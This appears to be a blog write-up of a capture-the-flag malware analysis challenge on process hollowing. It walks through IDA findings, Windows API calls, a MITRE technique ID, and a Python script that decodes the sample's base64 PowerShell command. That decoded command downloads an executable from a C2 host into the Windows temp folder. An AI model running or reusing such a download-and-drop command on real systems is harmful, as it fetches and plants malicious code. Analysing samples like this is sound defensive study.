
Injection Series Part 4

Hi everyone ~

Don’t forget the warning

image

Question 1) What is the process that would be first spawned by the sample? And what is the API used? (Format: process, APICall) (1 points)

The topic tags give a hint as well; this time I still use IDA

The question asks which process the sample creates first and which API it uses to do so.

OK, open the Strings tab in IDA and you will see it immediately

image

yah, now go to the IDA View-A tab to see which API call it uses

image

notepad.exe, CreateProcessA

Question 2) The value 4 has been pushed as a parameter to this API, what does that denote? (Format: FLAG) (1 points)

I still don’t quite understand what it does @~@, so go to GG and look it up

image

And these are the parameters of the API (CreateProcessA) hmmm…

After a while of looking things up, I found the documentation for this CreateProcessA function

image

Please read it, it’s very useful

image

A value of 4 (0x00000004) in dwCreationFlags means the process is created in a suspended state: its primary thread does not run until the ResumeThread function is called

image

Create_Suspended

Question 3) What is the domain that the malware tries to connect? (Format: domain.tld) (1 points)

You remember from the previous article there was a PowerShell command; let’s decode it and we will have the answer

image

SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgAGgAdAB0AHAAOgAvAC8AcwBvAG0AZQBjADIALgBzAGUAcgB2AGUAcgAvAGUAeABwAC4AZQB4AGUAIAAtAE8AdQB0AEYAaQBsAGUAIABjADoAXABcAHcAaQBuAGQAbwB3AHMAXABcAHQAZQBtAHAAXABcAGUAeABwAC4AZQB4AGUACgA=

go to CyberChef and decode it (From Base64)

this is the result after removing the null bytes (the command is UTF-16LE encoded, so every character is followed by a 0x00 byte)

Invoke-WebRequest -Uri http://somec2.server/exp.exe -OutFile c:\\windows\\temp\\exp.exe

image

somec2.server

Question 4) What is the cmdlet used to download the file and what is the path of the file stored? (Format: CMDLET, path) (1 points)

it’s right there in the decoded command above :>

Invoke-Webrequest, c:\windows\temp\exp.exe
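Questions 3 and 4 are just this decode step done by hand in CyberChef. As an added example (not part of the original post), here is the same triage in Python: base64 decode, interpret the bytes as UTF-16LE (which is what produces the "null bytes"), then pull the cmdlet, the C2 domain and the drop path out of the command. The encoded blob is the one from the writeup; `triage_sample` is a helper name I chose.

```python
import base64
import re
from urllib.parse import urlparse

# The encoded PowerShell command recovered from the sample in the writeup (Question 3).
ENCODED_COMMAND = "SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgAGgAdAB0AHAAOgAvAC8AcwBvAG0AZQBjADIALgBzAGUAcgB2AGUAcgAvAGUAeABwAC4AZQB4AGUAIAAtAE8AdQB0AEYAaQBsAGUAIABjADoAXABcAHcAaQBuAGQAbwB3AHMAXABcAHQAZQBtAHAAXABcAGUAeABwAC4AZQB4AGUACgA="


def decode_powershell_command(encoded: str) -> str:
    """Decode a base64 blob the way PowerShell's -EncodedCommand expects it.

    PowerShell encodes the script as UTF-16LE before base64, so a plain base64
    decode shows a 0x00 byte after every ASCII character. Decoding as UTF-16LE
    removes those "null bytes" instead of stripping them by hand.
    """
    raw = base64.b64decode(encoded)
    return raw.decode("utf-16-le").strip()


def extract_download(command: str) -> dict:
    """Pull cmdlet, URI, domain and output path out of an Invoke-WebRequest line."""
    cmdlet = re.match(r"\s*([\w-]+)", command)
    uri = re.search(r"-Uri\s+(\S+)", command, re.IGNORECASE)
    out = re.search(r"-OutFile\s+(\S+)", command, re.IGNORECASE)
    if not (cmdlet and uri and out):
        raise ValueError("not an Invoke-WebRequest download command")
    # The decoded command carries doubled backslashes; collapse them to the real path.
    path = out.group(1).replace("\\\\", "\\")
    return {
        "cmdlet": cmdlet.group(1),
        "uri": uri.group(1),
        "domain": urlparse(uri.group(1)).hostname,
        "path": path,
    }


def triage_sample() -> dict:
    """Run the full decode + extraction over the blob from the writeup."""
    return extract_download(decode_powershell_command(ENCODED_COMMAND))


if __name__ == "__main__":
    for key, value in triage_sample().items():
        print(f"{key}: {value}")
```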

Question 5) Just after the file download instructions, a function from ntdll has been loaded and invoked by the sample. What is the function name? (Format: Function) (2 points)

Finding it seems easy XD

image

NtUnmapViewOfSection

Question 6) After the allocation of memory and writing the data into the allocated memory. What are the 2 APIs used to update the entry point and resume the thread? (Format: API, API) (2 points)

It took me a while to notice the hint in the question itself: resume the thread

so let’s focus on searching the APIs for -> thread

image

SetThreadContext, ResumeThread

Question 7) What is the MITRE ID for this technique implemented in this sample? (Format: TXXXX.XXX) (2 points)

I tried with the 2 APIs I just found :)))

it’s wrongggggggg

image

Honestly, my goal is to try them all

image

But it was right to come here lol

image

T1055.002

goodbye, thank you for reading until now //~//

This post is licensed under CC BY 4.0 by the author.